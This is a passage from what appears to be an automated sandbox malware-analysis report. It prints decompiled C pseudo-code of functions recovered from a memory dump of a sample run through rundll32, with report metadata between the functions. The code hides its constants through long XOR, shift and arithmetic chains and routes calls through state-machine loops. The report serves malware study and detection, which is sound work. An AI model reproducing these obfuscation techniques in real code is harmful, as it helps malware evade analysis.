				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				intOrPtr* _t343;
				void* _t347;
				signed int* _t348;

				_t348 =  &_v132;
				_t343 = __ecx;
				_v4 = __ecx;
				_v40 = 0x7c806d;
				_v40 = _v40 + 0x9e80;
				_v40 = _v40 ^ 0x007d1eed;
				_v12 = 0xea5ac0;
				_v12 = _v12 + 0xffff451e;
				_v12 = _v12 ^ 0x00e99fde;
				_v24 = 0xace3a9;
				_t347 = 0;
				_t304 = 0xa;
				_v24 = _v24 / _t304;
				_v24 = _v24 ^ 0x001149f7;
				_t301 = 0x97dfe60;
				_v112 = 0x63471f;
				_v112 = _v112 ^ 0x706c6b64;
				_v112 = _v112 | 0x0d4cecae;
				_v112 = _v112 << 3;
				_v112 = _v112 ^ 0xea7f67f8;
				_v28 = 0x68a2fc;
				_t305 = 0x5b;
				_v28 = _v28 * 0x1c;
				_v28 = _v28 ^ 0x0b71d390;
				_v84 = 0x508d02;
				_v84 = _v84 | 0x7bfb7ba7;
				_v84 = _v84 ^ 0x7bffa5e3;
				_v124 = 0xc0d8a4;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 ^ 0xdba96bec;
				_v124 = _v124 + 0xffffcd63;
				_v124 = _v124 ^ 0xdb66cc39;
				_v116 = 0xc7a01f;
				_v116 = _v116 * 0x50;
				_v116 = _v116 << 7;
				_v116 = _v116 + 0x525d;
				_v116 = _v116 ^ 0x3100192e;
				_v88 = 0x173e76;
				_v88 = _v88 / _t305;
				_v88 = _v88 + 0xcdb8;
				_v88 = _v88 ^ 0x00098d3b;
				_v48 = 0x3a45de;
				_t306 = 0x3d;
				_v48 = _v48 / _t306;
				_v48 = _v48 ^ 0x0006d702;
				_v52 = 0xd8d0f7;
				_v52 = _v52 | 0xabcf1793;
				_v52 = _v52 + 0xffff6a1e;
				_v52 = _v52 ^ 0xabd8e28c;
				_v64 = 0xff5420;
				_v64 = _v64 >> 9;
				_v64 = _v64 + 0xffff2626;
				_v64 = _v64 ^ 0xfff0768b;
				_v80 = 0x65116e;
				_v80 = _v80 >> 9;
				_v80 = _v80 | 0xde6750c8;
				_v80 = _v80 ^ 0xde6208e1;
				_v56 = 0x2d6903;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 + 0xffff4c70;
				_v56 = _v56 ^ 0xfff58c10;
				_v132 = 0xe5be5a;
				_v132 = _v132 + 0xfffffbec;
				_v132 = _v132 << 3;
				_v132 = _v132 ^ 0x46ad3c03;
				_v132 = _v132 ^ 0x418237eb;
				_v108 = 0x3fa801;
				_v108 = _v108 + 0x902;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x9ac0b97a;
				_v108 = _v108 ^ 0x9ac73a04;
				_v72 = 0x454e35;
				_v72 = _v72 + 0x4c9c;
				_t307 = 0x29;
				_v72 = _v72 / _t307;
				_v72 = _v72 ^ 0x000328df;
				_v32 = 0x46b9f;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x0003d4b9;
				_v16 = 0xab007f;
				_v16 = _v16 ^ 0x56a4e801;
				_v16 = _v16 ^ 0x56002f48;
				_v100 = 0xb9d48c;
				_v100 = _v100 | 0xb434f54e;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x000dcd0e;
				_v92 = 0x17070b;
				_t308 = 0x37;
				_v92 = _v92 / _t308;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x0038b56c;
				_v60 = 0xdb418a;
				_v60 = _v60 * 0x4d;
				_v60 = _v60 << 2;
				_v60 = _v60 ^ 0x07c52fa3;
				_v68 = 0x99d1b0;
				_v68 = _v68 << 1;
				_v68 = _v68 + 0xadc1;
				_v68 = _v68 ^ 0x01384a96;
				_v120 = 0xfb4a64;
				_v120 = _v120 | 0x92bfeeef;
				_v120 = _v120 + 0x1827;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x0494323d;
				_v128 = 0xf75f57;
				_v128 = _v128 >> 4;
				_v128 = _v128 + 0xe158;
				_v128 = _v128 + 0xffff16ce;
				_v128 = _v128 ^ 0x000f9950;
				_v76 = 0xb94cf;
				_v76 = _v76 | 0xc911a6ab;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x3240c46f;
				_v104 = 0x7ca07;
				_v104 = _v104 * 0x23;
				_v104 = _v104 >> 4;
				_v104 = _v104 ^ 0xe4d42587;
				_v104 = _v104 ^ 0xe4c14657;
				_v44 = 0x308a5a;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 ^ 0x0006e55e;
				_v96 = 0x427aa5;
				_v96 = _v96 + 0xed3d;
				_v96 = _v96 + 0xffff13f4;
				_v96 = _v96 ^ 0x0046a078;
				_v20 = 0xf8f4;
				_v20 = _v20 * 0x4a;
				_t284 = 0x4469cd4;
				_v20 = _v20 ^ 0x004ab19f;
				_v36 = 0x7998ac;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x0008cf6c;
				do {
					while(_t301 != _t284) {
						if(_t301 == 0x661bd7c) {
							E0068957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E0069DCF7(_v84, 0x681954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E00689462(_t293, _v80,  &_v8, E0069DCF7(_v88, 0x681814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E0068A8B0(_v132, _t293, _v108);
								E0068A8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E0069DCF7(_v16, 0x681854, __eflags);
					_pop(_t311);
					_t286 =  *0x6a3dfc; // 0x0
					__eflags = E0068AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E0068A8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                      0x0069907f
                                                                                                                      0x00699089
                                                                                                                      0x0069908b
                                                                                                                      0x00699092
                                                                                                                      0x0069909c
                                                                                                                      0x006990a4
                                                                                                                      0x006990ac
                                                                                                                      0x006990b7
                                                                                                                      0x006990c2
                                                                                                                      0x006990cd
                                                                                                                      0x006990db
                                                                                                                      0x006990dd
                                                                                                                      0x006990e2
                                                                                                                      0x006990eb
                                                                                                                      0x006990f6
                                                                                                                      0x006990fb
                                                                                                                      0x00699103
                                                                                                                      0x0069910b
                                                                                                                      0x00699113
                                                                                                                      0x00699118
                                                                                                                      0x00699120
                                                                                                                      0x0069912d
                                                                                                                      0x00699130
                                                                                                                      0x00699134
                                                                                                                      0x0069913c
                                                                                                                      0x00699144
                                                                                                                      0x0069914c
                                                                                                                      0x00699154
                                                                                                                      0x0069915c
                                                                                                                      0x00699164
                                                                                                                      0x0069916c
                                                                                                                      0x00699174
                                                                                                                      0x0069917c
                                                                                                                      0x00699189
                                                                                                                      0x0069918d
                                                                                                                      0x00699192
                                                                                                                      0x0069919a
                                                                                                                      0x006991a2
                                                                                                                      0x006991b2
                                                                                                                      0x006991b6
                                                                                                                      0x006991be
                                                                                                                      0x006991c6
                                                                                                                      0x006991d2
                                                                                                                      0x006991d5
                                                                                                                      0x006991d9
                                                                                                                      0x006991e1
                                                                                                                      0x006991e9
                                                                                                                      0x006991f1
                                                                                                                      0x006991f9
                                                                                                                      0x00699201
                                                                                                                      0x00699209
                                                                                                                      0x0069920e
                                                                                                                      0x00699216
                                                                                                                      0x0069921e
                                                                                                                      0x00699226
                                                                                                                      0x0069922b
                                                                                                                      0x00699233
                                                                                                                      0x0069923b
                                                                                                                      0x00699243
                                                                                                                      0x00699248
                                                                                                                      0x00699250
                                                                                                                      0x00699258
                                                                                                                      0x00699260
                                                                                                                      0x00699268
                                                                                                                      0x0069926d
                                                                                                                      0x00699277
                                                                                                                      0x0069927f
                                                                                                                      0x00699287
                                                                                                                      0x0069928f
                                                                                                                      0x00699294
                                                                                                                      0x0069929c
                                                                                                                      0x006992a4
                                                                                                                      0x006992ac
                                                                                                                      0x006992ba
                                                                                                                      0x006992bf
                                                                                                                      0x006992c5
                                                                                                                      0x006992cd
                                                                                                                      0x006992d5
                                                                                                                      0x006992da
                                                                                                                      0x006992e2
                                                                                                                      0x006992ed
                                                                                                                      0x006992f8
                                                                                                                      0x00699303
                                                                                                                      0x0069930b
                                                                                                                      0x00699313
                                                                                                                      0x00699318
                                                                                                                      0x00699320
                                                                                                                      0x0069932c
                                                                                                                      0x0069932f
                                                                                                                      0x00699333
                                                                                                                      0x00699338
                                                                                                                      0x00699340
                                                                                                                      0x0069934d
                                                                                                                      0x00699351
                                                                                                                      0x00699356
                                                                                                                      0x0069935e
                                                                                                                      0x00699366
                                                                                                                      0x0069936a
                                                                                                                      0x00699372
                                                                                                                      0x0069937a
                                                                                                                      0x00699382
                                                                                                                      0x0069938a
                                                                                                                      0x00699392
                                                                                                                      0x00699397
                                                                                                                      0x0069939f
                                                                                                                      0x006993a7
                                                                                                                      0x006993ac
                                                                                                                      0x006993b4
                                                                                                                      0x006993bc
                                                                                                                      0x006993c4
                                                                                                                      0x006993cc
                                                                                                                      0x006993d4
                                                                                                                      0x006993d9
                                                                                                                      0x006993e1
                                                                                                                      0x006993ee
                                                                                                                      0x006993f2
                                                                                                                      0x006993f7
                                                                                                                      0x006993ff
                                                                                                                      0x00699407
                                                                                                                      0x0069940f
                                                                                                                      0x00699414
                                                                                                                      0x0069941c
                                                                                                                      0x00699424
                                                                                                                      0x0069942c
                                                                                                                      0x00699434
                                                                                                                      0x0069943c
                                                                                                                      0x0069944f
                                                                                                                      0x00699456
                                                                                                                      0x0069945b
                                                                                                                      0x00699466
                                                                                                                      0x0069946e
                                                                                                                      0x00699473
                                                                                                                      0x0069947b
                                                                                                                      0x0069947b
                                                                                                                      0x00699489
                                                                                                                      0x006995e5
                                                                                                                      0x0069948f
                                                                                                                      0x00699495
                                                                                                                      0x006994aa
                                                                                                                      0x006994b3
                                                                                                                      0x006994bb
                                                                                                                      0x006994c0
                                                                                                                      0x006994cb
                                                                                                                      0x0069950e
                                                                                                                      0x00699519
                                                                                                                      0x0069951c
                                                                                                                      0x0069952e
                                                                                                                      0x00699533
                                                                                                                      0x006995b5
                                                                                                                      0x006995b5
                                                                                                                      0x006995ba
                                                                                                                      0x00000000
                                                                                                                      0x00699497
                                                                                                                      0x0069949d
                                                                                                                      0x00000000
                                                                                                                      0x006994a3
                                                                                                                      0x006994a3
                                                                                                                      0x00000000
                                                                                                                      0x006994a3
                                                                                                                      0x0069949d
                                                                                                                      0x00699495
                                                                                                                      0x006995ef
                                                                                                                      0x006995f9
                                                                                                                      0x006995f9
                                                                                                                      0x0069953c
                                                                                                                      0x00699545
                                                                                                                      0x00699550
                                                                                                                      0x00699556
                                                                                                                      0x00699564
                                                                                                                      0x006995a0
                                                                                                                      0x006995a2
                                                                                                                      0x006995ab
                                                                                                                      0x006995b0
                                                                                                                      0x00000000
                                                                                                                      0x006995bd
                                                                                                                      0x006995bd
                                                                                                                      0x006995bd
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                      • API String ID: 0-668800459
                                                                                                                      • Opcode ID: d82b1ef04f7e83c3eef04a36bf1c3aec4422f9019696af1e44c5fc1860d7f77d
                                                                                                                      • Instruction ID: 72608163c4afc3059a6bad2a2927955e9ae782f9b36073bff681ed6ed8962509
                                                                                                                      • Opcode Fuzzy Hash: d82b1ef04f7e83c3eef04a36bf1c3aec4422f9019696af1e44c5fc1860d7f77d
                                                                                                                      • Instruction Fuzzy Hash: F7D111B11087808FD7A9CF25C48A50BBBF2FBC4758F50891DF5AA86260DBB58949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069D389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E0069D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E006920B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
				_v128 = _v128 ^ 0x275b8ca8;
				_v136 = 0x1b49e9;
				_v136 = _v136 * 0x22;
				_v136 = _v136 ^ 0x6bc19a50;
				_v136 = _v136 ^ 0xda04c504;
				_v136 = _v136 ^ 0xb25c1cc6;
				do {
					while(_t280 != 0x9b6c7ef) {
						if(_t280 == 0xd3d1227) {
							_t280 = 0x9b6c7ef;
							continue;
						} else {
							if(_t280 == 0xd8aa277) {
								E00699008(_v72, _v128, _v136);
							} else {
								_t317 = _t280 - 0xdb35d55;
								if(_t280 != 0xdb35d55) {
									goto L10;
								} else {
									_push(_v164);
									_push(_v132);
									_t308 = 0x44;
									E00684B61( &_v68, _t308);
									_push(_v92);
									_v68 = _t308;
									_push(_v156);
									_t284 = _v76;
									_v60 = E0069DCF7(_v76, 0x68173c, _t317);
									_t307 = E0069DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
									E0068A8B0(_v144, _v60, _v112);
									_t311 =  &(_t311[0x19]);
									_t280 = 0xd8aa277;
									continue;
								}
							}
						}
						L13:
						return _t307;
					}
					_t263 = E00684241(_t280, _v120,  &_v72, _a28, _v104);
					_t311 =  &(_t311[3]);
					__eflags = _t263;
					if(_t263 == 0) {
						_t280 = 0xcb447d9;
						goto L10;
					} else {
						_t280 = 0xdb35d55;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t280 - 0xcb447d9;
				} while (_t280 != 0xcb447d9);
				goto L13;
			}












































                                                                                                                      0x0069d393
                                                                                                                      0x0069d39c
                                                                                                                      0x0069d39e
                                                                                                                      0x0069d3a5
                                                                                                                      0x0069d3a6
                                                                                                                      0x0069d3ad
                                                                                                                      0x0069d3b4
                                                                                                                      0x0069d3b5
                                                                                                                      0x0069d3bc
                                                                                                                      0x0069d3be
                                                                                                                      0x0069d3c3
                                                                                                                      0x0069d3ca
                                                                                                                      0x0069d3cd
                                                                                                                      0x0069d3d5
                                                                                                                      0x0069d3d7
                                                                                                                      0x0069d3e1
                                                                                                                      0x0069d3e9
                                                                                                                      0x0069d3ee
                                                                                                                      0x0069d3f6
                                                                                                                      0x0069d3fb
                                                                                                                      0x0069d403
                                                                                                                      0x0069d40b
                                                                                                                      0x0069d413
                                                                                                                      0x0069d41b
                                                                                                                      0x0069d41f
                                                                                                                      0x0069d427
                                                                                                                      0x0069d42f
                                                                                                                      0x0069d434
                                                                                                                      0x0069d439
                                                                                                                      0x0069d441
                                                                                                                      0x0069d449
                                                                                                                      0x0069d44d
                                                                                                                      0x0069d455
                                                                                                                      0x0069d45d
                                                                                                                      0x0069d465
                                                                                                                      0x0069d46d
                                                                                                                      0x0069d475
                                                                                                                      0x0069d480
                                                                                                                      0x0069d485
                                                                                                                      0x0069d48b
                                                                                                                      0x0069d493
                                                                                                                      0x0069d49b
                                                                                                                      0x0069d49f
                                                                                                                      0x0069d4a7
                                                                                                                      0x0069d4af
                                                                                                                      0x0069d4b7
                                                                                                                      0x0069d4bf
                                                                                                                      0x0069d4c7
                                                                                                                      0x0069d4cf
                                                                                                                      0x0069d4d7
                                                                                                                      0x0069d4df
                                                                                                                      0x0069d4e7
                                                                                                                      0x0069d4f4
                                                                                                                      0x0069d4f5
                                                                                                                      0x0069d4f9
                                                                                                                      0x0069d4fe
                                                                                                                      0x0069d506
                                                                                                                      0x0069d50e
                                                                                                                      0x0069d51c
                                                                                                                      0x0069d525
                                                                                                                      0x0069d529
                                                                                                                      0x0069d531
                                                                                                                      0x0069d539
                                                                                                                      0x0069d53e
                                                                                                                      0x0069d546
                                                                                                                      0x0069d54e
                                                                                                                      0x0069d558
                                                                                                                      0x0069d565
                                                                                                                      0x0069d570
                                                                                                                      0x0069d575
                                                                                                                      0x0069d57b
                                                                                                                      0x0069d583
                                                                                                                      0x0069d58b
                                                                                                                      0x0069d58f
                                                                                                                      0x0069d594
                                                                                                                      0x0069d59c
                                                                                                                      0x0069d5a4
                                                                                                                      0x0069d5ac
                                                                                                                      0x0069d5b4
                                                                                                                      0x0069d5bc
                                                                                                                      0x0069d5c4
                                                                                                                      0x0069d5cc
                                                                                                                      0x0069d5d4
                                                                                                                      0x0069d5dc
                                                                                                                      0x0069d5e4
                                                                                                                      0x0069d5ec
                                                                                                                      0x0069d5f0
                                                                                                                      0x0069d5f8
                                                                                                                      0x0069d600
                                                                                                                      0x0069d608
                                                                                                                      0x0069d610
                                                                                                                      0x0069d618
                                                                                                                      0x0069d620
                                                                                                                      0x0069d628
                                                                                                                      0x0069d630
                                                                                                                      0x0069d638
                                                                                                                      0x0069d63d
                                                                                                                      0x0069d645
                                                                                                                      0x0069d64a
                                                                                                                      0x0069d652
                                                                                                                      0x0069d65a
                                                                                                                      0x0069d662
                                                                                                                      0x0069d667
                                                                                                                      0x0069d671
                                                                                                                      0x0069d676
                                                                                                                      0x0069d67c
                                                                                                                      0x0069d684
                                                                                                                      0x0069d690
                                                                                                                      0x0069d698
                                                                                                                      0x0069d69c
                                                                                                                      0x0069d6a4
                                                                                                                      0x0069d6ac
                                                                                                                      0x0069d6b4
                                                                                                                      0x0069d6bc
                                                                                                                      0x0069d6c9
                                                                                                                      0x0069d6cd
                                                                                                                      0x0069d6d5
                                                                                                                      0x0069d6e2
                                                                                                                      0x0069d6e6
                                                                                                                      0x0069d6ee
                                                                                                                      0x0069d6f6
                                                                                                                      0x0069d6fe
                                                                                                                      0x0069d6fe
                                                                                                                      0x0069d70c
                                                                                                                      0x0069d7ec
                                                                                                                      0x00000000
                                                                                                                      0x0069d712
                                                                                                                      0x0069d718
                                                                                                                      0x0069d839
                                                                                                                      0x0069d71e
                                                                                                                      0x0069d71e
                                                                                                                      0x0069d720
                                                                                                                      0x00000000
                                                                                                                      0x0069d726
                                                                                                                      0x0069d726
                                                                                                                      0x0069d72e
                                                                                                                      0x0069d734
                                                                                                                      0x0069d737
                                                                                                                      0x0069d73c
                                                                                                                      0x0069d745
                                                                                                                      0x0069d74c
                                                                                                                      0x0069d750
                                                                                                                      0x0069d75c
                                                                                                                      0x0069d7d4
                                                                                                                      0x0069d7da
                                                                                                                      0x0069d7df
                                                                                                                      0x0069d7e2
                                                                                                                      0x00000000
                                                                                                                      0x0069d7e2
                                                                                                                      0x0069d720
                                                                                                                      0x0069d718
                                                                                                                      0x0069d840
                                                                                                                      0x0069d84b
                                                                                                                      0x0069d84b
                                                                                                                      0x0069d807
                                                                                                                      0x0069d80c
                                                                                                                      0x0069d80f
                                                                                                                      0x0069d811
                                                                                                                      0x0069d81a
                                                                                                                      0x00000000
                                                                                                                      0x0069d813
                                                                                                                      0x0069d813
                                                                                                                      0x00000000
                                                                                                                      0x0069d813
                                                                                                                      0x00000000
                                                                                                                      0x0069d81f
                                                                                                                      0x0069d81f
                                                                                                                      0x0069d81f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: T.~$hc$ru$($0$K<
                                                                                                                      • API String ID: 0-2343433060
                                                                                                                      • Opcode ID: bfe18d91f59b2b93a9d4a252447f8563bf78adfb0e9715053c9a2d16b8fc800f
                                                                                                                      • Instruction ID: 20c2567ac5247884e65b77bbadb16e81701728d254b1cf4f4e1640024416deb6
                                                                                                                      • Opcode Fuzzy Hash: bfe18d91f59b2b93a9d4a252447f8563bf78adfb0e9715053c9a2d16b8fc800f
                                                                                                                      • Instruction Fuzzy Hash: BCC133725083809FD768CF65C986A5BFBE2FBD5744F104A1DF29A96260C7B28909CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00683E3F Relevance: 7.7, Strings: 6, Instructions: 217COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00683E3F() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t213;
				signed int _t214;
				void* _t216;
				signed int _t222;
				intOrPtr _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				void* _t230;
				void* _t236;
				void* _t257;
				signed int* _t261;

				_t261 =  &_v100;
				_v8 = 0xc74bd8;
				_v4 = 0;
				_v72 = 0x3d4417;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xffff33fd;
				_v72 = _v72 ^ 0xbd434afc;
				_v32 = 0xa9ac19;
				_v32 = _v32 + 0x4aca;
				_v32 = _v32 ^ 0x00a9f6e1;
				_v40 = 0x1f6a8;
				_v12 = 0;
				_v40 = _v40 * 0x6f;
				_t257 = 0xf52a3f4;
				_v40 = _v40 ^ 0x00d19880;
				_v44 = 0x168b17;
				_v44 = _v44 + 0x13a5;
				_v44 = _v44 ^ 0x001ee95f;
				_v48 = 0xfac2ed;
				_v48 = _v48 + 0xffff2a35;
				_v48 = _v48 ^ 0x00fbd9f9;
				_v92 = 0xc00c53;
				_v92 = _v92 + 0xffff1aa9;
				_v92 = _v92 + 0xf2d7;
				_t225 = 0x68;
				_v92 = _v92 / _t225;
				_v92 = _v92 ^ 0x0000565c;
				_v68 = 0xf2ac97;
				_v68 = _v68 ^ 0x99fc0549;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000a8804;
				_v24 = 0xf89d13;
				_t226 = 0x49;
				_v24 = _v24 / _t226;
				_v24 = _v24 ^ 0x000ed122;
				_v96 = 0x9976f7;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0xdd1af6ea;
				_v96 = _v96 ^ 0x684d855d;
				_v96 = _v96 ^ 0xb5551d4c;
				_v28 = 0x12a2d6;
				_t227 = 0xe;
				_v28 = _v28 * 0x29;
				_v28 = _v28 ^ 0x02ffade5;
				_v100 = 0x1d8880;
				_v100 = _v100 + 0x8a1e;
				_v100 = _v100 * 0x7c;
				_v100 = _v100 + 0xffff421a;
				_v100 = _v100 ^ 0x0e9f1559;
				_v36 = 0x784079;
				_v36 = _v36 / _t227;
				_v36 = _v36 ^ 0x0007caf6;
				_v60 = 0xd037f8;
				_v60 = _v60 >> 0xf;
				_v60 = _v60 + 0xfffff3b4;
				_v60 = _v60 ^ 0xfff3df4e;
				_v64 = 0x95f516;
				_v64 = _v64 + 0xffffc55a;
				_v64 = _v64 | 0x523f0ae6;
				_v64 = _v64 ^ 0x52b19695;
				_v84 = 0x271827;
				_v84 = _v84 + 0xffff7017;
				_v84 = _v84 + 0x1e15;
				_v84 = _v84 ^ 0xa1c53b6b;
				_v84 = _v84 ^ 0xa1e64a9e;
				_v52 = 0x3d5883;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x000b56f4;
				_v56 = 0xd5acf2;
				_v56 = _v56 ^ 0x15c9a5cd;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0xa8e6808a;
